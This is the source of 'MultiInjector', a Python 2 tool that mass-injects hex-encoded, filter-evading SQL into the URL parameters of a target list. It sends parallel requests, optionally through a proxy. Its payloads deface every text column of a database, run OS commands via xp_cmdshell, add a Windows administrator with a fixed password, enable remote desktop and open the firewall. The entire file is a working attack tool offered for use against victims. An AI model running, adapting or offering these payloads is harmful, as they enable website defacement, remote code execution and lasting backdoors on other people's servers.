  1. #!/usr/bin/env python
  2. """
  3. MultiInjector v.035
  4. Copyright 2009-2011, Raviv Raz - ravivr@gmail.com
  5. MultiInjector is distributed under the terms of the GNU General Public License
  6. MultiInjector is free software: you can redistribute it and/or modify
  7. it under the terms of the GNU General Public License as published by
  8. the Free Software Foundation, either version 3 of the License, or
  9. (at your option) any later version.
  10.  
  11. This program is distributed in the hope that it will be useful,
  12. but WITHOUT ANY WARRANTY; without even the implied warranty of
  13. MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
  14. GNU General Public License for more details.
  15.  
  16. You should have received a copy of the GNU General Public License
  17. along with this program. If not, see <http://www.gnu.org/licenses/>.
  18.  
  19. """
  20. try:
  21. import psyco
  22. except:
  23. pass
  24. from sys import stdout,argv,stderr
  25. import pycurl
  26. from urlparse import urlsplit,urlunsplit
  27. from urllib import quote
  28. from os import system
  29. import binascii
  30. import StringIO
  31. from re import findall
  32.  
  33. class callback:
  34. def __init__(self):
  35. self.contents = ''
  36. buffer = StringIO.StringIO
  37. def feed(self, buf):
  38. self.contents = self.contents + buf
  39.  
  40. def fireUp(target_list,num_conn,proxy_addr,proxy_port):
  41. tuples = target_list
  42. try:
  43. import signal
  44. from signal import SIGPIPE, SIG_IGN
  45. signal.signal(signal.SIGPIPE, signal.SIG_IGN)
  46. except ImportError:
  47. pass
  48. queue = []
  49. for tuple in tuples:
  50. for url in tuple:
  51. if not url or url[0] == "#":
  52. url = str(url).strip()
  53. continue
  54. cb = callback()
  55. queue.append((url,cb))
  56. num_urls = len(queue)
  57. num_conn = min(num_conn, num_urls)
  58. assert 1 <= num_conn <= 10000, "invalid number of concurrent connections"
  59. m = pycurl.CurlMulti()
  60. m.handles = []
  61. for i in range(num_conn):
  62. c = pycurl.Curl()
  63. c.setopt(pycurl.FOLLOWLOCATION, 1)
  64. c.setopt(pycurl.MAXREDIRS, 5)
  65. c.setopt(pycurl.CONNECTTIMEOUT, 30)
  66. c.setopt(pycurl.TIMEOUT, 300)
  67. c.setopt(pycurl.NOSIGNAL, 1)
  68. c.setopt(pycurl.USERAGENT,"""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)""")
  69. c.setopt(pycurl.HTTPHEADER, ["""Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5""" ,
  70. """Accept-Language: en-us,en;q=0.5""",
  71. """Accept-Encoding: gzip,deflate""",
  72. """Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7""",
  73. """Keep-Alive: 300""",
  74. """Connection: keep-alive"""])
  75. if proxy_addr != '':
  76. c.setopt(pycurl.PROXY,proxy_addr)
  77. c.setopt(pycurl.PROXYPORT,proxy_port)
  78. m.handles.append(c)
  79. freelist = m.handles[:]
  80. num_processed = 0
  81. while num_processed < num_urls:
  82. while queue and freelist:
  83. url,cb = queue.pop(0)
  84. c = freelist.pop()
  85. c.setopt(pycurl.URL, url)
  86. c.setopt(pycurl.WRITEFUNCTION, cb.feed)
  87. m.add_handle(c)
  88. c.url = url
  89. while 1:
  90. ret, num_handles = m.perform()
  91. if ret != pycurl.E_CALL_MULTI_PERFORM:
  92. break
  93. while 1:
  94. num_q, ok_list, err_list = m.info_read()
  95. for c in ok_list:
  96. m.remove_handle(c)
  97. freelist.append(c)
  98. for c, errno, errmsg in err_list:
  99. m.remove_handle(c)
  100. freelist.append(c)
  101. num_processed = num_processed + len(ok_list) + len(err_list)
  102. if num_q == 0:
  103. break
  104. m.select(1.0)
  105. for c in m.handles:
  106. c.close()
  107. m.close()
  108. def usage():
  109. stdout.write("""\nCopyright 2008, Raviv Raz - ravivr@gmail.com\nThis program is distributed under the terms of the GNU General Public License\nMultiInjector is an automatic SQL injection utility. It uses a list of URI addresses to test parameter manipulation.\n\
  110. Once a vulnerable parameter has been found, a signature-evasive SQL injection is performed in order to achieve\n\
  111. one of the following goals:\n
  112. 1) Automatic defacement
  113. 2) Run OS shell command on DB server
  114. 3) Run SQL query on DB server
  115. 4) Enable OS shell procedure on DB
  116. 5) Add administrative user to DB server with password: T0pSeKret
  117. 6) Enable remote desktop on DB server
  118. 7) Add allowed program to Windows Firewall on DB server
  119. \nUsage: %s [url list] \n\n"""%argv[0])
  120. raise SystemExit
  121. def build_payload(input,choice,program_name):
  122. program_name = program_name.replace("\'","\\'").replace('\"','\\"').replace('>','\>')
  123. input = input.replace("\'","\\'").replace('\"','\\"').replace('>','\>')
  124. if choice ==1:
  125. sql_cmd = """DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''%s''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor;"""%input
  126. elif choice ==2:
  127. sql_cmd = """EXEC MASTER..XP_CMDSHELL '%s'"""%input
  128. elif choice ==3:
  129. sql_cmd = """EXEC '%s'"""%input
  130. elif choice ==4:
  131. sql_cmd = """EXEC sp_configure 'show advanced options',1 ; RECONFIGURE ; EXEC sp_configure 'xp_cmdshell',1 ; RECONFIGURE"""
  132. elif choice ==5:
  133. sql_cmd = """EXEC MASTER..XP_CMDSHELL 'net user %s T0pSeKret /add && net localgroup administrators %s /add'"""%(input,input)
  134. elif choice ==6:
  135. sql_cmd = """EXECUTE master.dbo.xp_regwrite N'HKEY_LOCAL_MACHINE',N'SYSTEM\CurrentControlSet\Control\Terminal Server',N'fDenyTSConnections',N'REG_DWORD',0;--"""
  136. elif choice ==7:
  137. input = input.replace("\'","\\'").replace('\"','\\"')
  138. sql_cmd = """EXEC MASTER..XP_CMDSHELL 'netsh firewall add allowedprogram %s %s ENABLE'"""%(input,program_name)
  139. if len(input) % 2 == 0:
  140. payload = binascii.hexlify(sql_cmd)
  141. else:
  142. payload = binascii.hexlify(sql_cmd[:-1])
  143. cmd = " or 1=1;DECLARE @S VARCHAR(4000);SET @S=CAST(0x%s AS VARCHAR(4000));EXEC(@S);--"%payload
  144. return quote(cmd)
  145. def fullurl(host,path,params):
  146. return urlunsplit(('http',host,path,params,''))
  147. def is_numeric(param):
  148. if findall("^.*=[0-9]+$",param):
  149. return True
  150. else:
  151. return False
  152. def change_params(params,payload):
  153. new_list = []
  154. split_params = params.split('&')
  155. for i in range(len(split_params)):
  156. if is_numeric(split_params[i]):
  157. new_param = str(split_params[i])+payload
  158. else:
  159. new_param = str(split_params[i])+"%27"+payload
  160. new_list.append(params.replace(split_params[i],new_param))
  161. return new_list
  162. def add_payload(url,payload):
  163. spliturl = urlsplit(url,allow_fragments=True)
  164. protocol = spliturl[0]
  165. host = spliturl[1]
  166. params = spliturl[3]
  167. path = spliturl[2]
  168. new_params = change_params(params,payload)
  169. new_urls =[]
  170. for param in new_params:
  171. new_urls.append(fullurl(host,path,param))
  172. return new_urls
  173. def find_parameterized_urls(list):
  174. newlist = []
  175. for item in list:
  176. if urlsplit(item)[3] != '':
  177. newlist.append(item.strip())
  178. return newlist
  179. def menu():
  180. conn_num = 5
  181. system('cls')
  182. stdout.write("""
  183. Please choose the attack of your flavor:\n
  184. 1) Automatic defacement
  185. 2) Run OS shell command on DB server
  186. 3) Run SQL query on DB server
  187. 4) Enable OS shell procedure on DB
  188. 5) Add administrative user to DB server with password: T0pSeKret
  189. 6) Enable remote desktop on DB server
  190. 7) Add allowed program to Windows Firewall on DB server
  191. \n""")
  192. try:
  193. program = ""
  194. choice = int(raw_input("> "))
  195. if choice == 1:
  196. command = str(raw_input("\n\nEnter defacement content:\n\n> "))
  197. elif choice == 2:
  198. command = str(raw_input("\n\nEnter OS command to run:\n\n> "))
  199. elif choice == 3:
  200. command = str(raw_input("\n\nEnter SQL query to run:\n\n> "))
  201. elif choice == 4:
  202. command = ""
  203. elif choice == 5:
  204. command = str(raw_input("\n\nEnter administrative user name:\n\n>"))
  205. elif choice == 6:
  206. command = ""
  207. elif choice == 7:
  208. command = str(raw_input("Enter program full path (c:\path\program.exe):\n>"))
  209. program = str(raw_input("Enter program name in firewall allowed programs list:\n>"))
  210. elif not choice in (1,2,3,4,5,6,7):
  211. menu()
  212. except KeyboardInterrupt:
  213. stdout.write('\n\nC ya!\n\n')
  214. raise SystemExit
  215. except:
  216. menu()
  217. stdout.write('Number of parallel connections: (default=5)\n')
  218. try:
  219. conn_num = int(raw_input("> "))
  220. except:
  221. conn_num = 5
  222. stdout.write('Use HTTP proxy? [y/n]: (default=n)\n')
  223. use_proxy = (raw_input("> "))
  224. if 'y' in use_proxy:
  225. stdout.write('Proxy address: \n')
  226. proxy_addr = (raw_input("> "))
  227. stdout.write('Proxy port: \n')
  228. proxy_port = int(raw_input("> "))
  229. else:
  230. proxy_addr = ''
  231. proxy_port = 0
  232. return choice,command,conn_num,proxy_addr,proxy_port,program
  233. def main():
  234. if len(argv)<2:
  235. usage()
  236. else:
  237. try:
  238. stdout.write('\n[!] Opening url file...\n')
  239. old_urls = open(argv[1]).readlines()
  240. except:
  241. stderr.write("""\n[x] Failed to open %s \n"""%argv[1])
  242. raise SystemExit
  243. choice,command,conn_num,proxy_addr,proxy_port,program_name = menu()
  244. payload = build_payload(command,choice,program_name)
  245. stdout.write('[!] Bombs Away !!\n')
  246. urls = []
  247. for item in find_parameterized_urls(old_urls):
  248. injected = add_payload(item,payload)
  249. urls.append(injected)
  250. if len(urls)>0:
  251. if proxy_addr !='':
  252. fireUp(urls,conn_num,proxy_addr,proxy_port)
  253. elif proxy_addr =='':
  254. fireUp(urls,conn_num,'',0)
  255. stdout.write('[v] Attacks finished\n')
  256. else:
  257. print """[x] No URL found with parameters to inject.\nWe must have at least one URL like:\nhttp://www.victim.com/program.asp?p1=v1&p2=v2"""
  258. if __name__ == "__main__":
  259. main()